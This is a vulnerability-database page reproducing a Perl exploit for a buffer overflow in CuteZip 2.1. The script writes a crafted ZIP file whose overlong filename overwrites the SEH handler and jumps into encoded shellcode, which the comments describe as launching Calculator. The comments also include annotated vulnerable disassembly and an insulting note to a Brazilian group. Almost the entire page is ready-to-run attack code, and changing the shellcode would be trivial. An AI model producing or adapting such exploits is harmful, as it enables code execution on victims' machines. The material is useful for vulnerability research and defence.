Vulners
Lucene search
CuteZip 2.1 Buffer Overflow
`#!/usr/bin/perl
#
#[+]Exploit Title: Exploit Buffer Overflow CuteZip 2.1
#[+]Date: 02\12\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.globalscape.com/files/cutezip20b.exe
#[+]Version: 2.1 build 9.24.1
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
# Comment in Brazilian Portuguese
# ||
# ||
# \/
#
#Comentario para quem é do Brasil:
#
#Ola Lammers Brasileiros Copiando Receitas de Bolos na internet né,
#Um Bando de Lammers que dizem ser o Metasploit Brazil
#Caras Voces Nao sabem nem Programar em ruby,perl,python,c ou java
#Estude muito,nao suje o no do Metasploit.
#
#Esse Recado foi para o Metasploit Brasil se tiver Achando Ruim
#Me Contate por E-mail.
#
#
#
#Comment:
#
# The structure of this exploit has zip Copied exploits of the team Corelan
# Link: http://www.exploit-db.com/exploits/11764/
#
#
# Vulnerable function
# ||
# ||
# \/
#
# 0x0047CC0E .^72 CC JB SHORT CuteZip.0047CBDC
# 0x0047CC10 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC12 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC19 8D49 00 LEA ECX,DWORD PTR DS:[ECX]
# 0x0047CC1C > 23D1 AND EDX,ECX
# 0x0047CC1E . 8A06 MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC20 . 8807 MOV BYTE PTR DS:[EDI],AL
# 0x0047CC22 . 8A46 01 MOV AL,BYTE PTR DS:[ESI+1]
# 0x0047CC25 . C1E9 02 SHR ECX,2
# 0x0047CC28 . 8847 01 MOV BYTE PTR DS:[EDI+1],AL
# 0x0047CC2B . 83C6 02 ADD ESI,2
# 0x0047CC2E . 83C7 02 ADD EDI,2
# 0x0047CC31 . 83F9 08 CMP ECX,8
# 0x0047CC34 .^72 A6 JB SHORT CuteZip.0047CBDC
# 0x0047CC36 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> ===> //Here is the function that occurs Buffer Overflow
# 0x0047CC38 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC3F 90 NOP
# 0x0047CC40 > 23D1 AND EDX,ECX
# 0x0047CC42 . 8A06 MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC44 . 8807 MOV BYTE PTR DS:[EDI],AL
# 0x0047CC46 . 46 INC ESI
# 0x0047CC47 . C1E9 02 SHR ECX,2
# 0x0047CC4A . 47 INC EDI
# 0x0047CC4B . 83F9 08 CMP ECX,8
# 0x0047CC4E .^72 8C JB SHORT CuteZip.0047CBDC
# 0x0047CC50 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC52 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC59 8D49 00 LEA ECX,DWORD PTR DS:[ECX]
#
#
#
#
#
#
#
use IO::File;
if($^O=="windows")
{
system("cls");
system("color 4f");
}
else
{
system("clear");
}
sub banner
{
print q{
[+]Exploit: Exploit Buffer Overflow CuteZip 2.1
[+]Date: 02\\12\\2011
[+]Author: C4SS!0 G0M3S
[+]Home: www.invasao.com.br
[+]E-mail: [email protected]
[+]Version: 2.1 build 9.24.1
[+]Thanks: Corelan Team, Skylined
[+]Impact: Hich
};
}
my $file = $ARGV[0];
if($#ARGV!=0)
{
banner;
print "[-]Usage: $0 <File Name>\n";
print "[-]Exemple: $0 Exploit.zip\n";
exit(0);
}
banner;
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
my $payload = "\x41" x 1148;
my $nseh = "\xeb\x07\x90\x90";
my $seh = pack('V',0x0040112F);
my $egg = "\x41" x 2;
$egg .= "\x61\x61\x61\x51\x58\xFF\xD0";
my $shellcode = "\x41" x 123;
print "[*]Identifying the length Shellcode\n";
sleep(1);
$shellcode = $shellcode.
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".
"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".
"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);
"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".
"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".
"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".
"K4BX0S5LKNQX14OM8646B9CZOA";
print "[*]The length is Shellcode:".(length($shellcode)-123)."\n";
sleep(1);
my $junk = "\x42" x (4064-length($payload.$nseh.$seh.$egg.$shellcode));
$payload = $payload.$nseh.$seh.$egg.$shellcode.$junk;
$payload = $payload.".txt";
my $Exploit = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;
print "[*]Creating the file $file\n";
sleep(1);
open(f,">$file")|| die("Error:\n$!\n");
print f $Exploit;
close(f);
print "[*]The File $file Created Successfully\n";
sleep(1);
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Feb 2011 00:00Current
0.8Low risk
Vulners AI Score0.8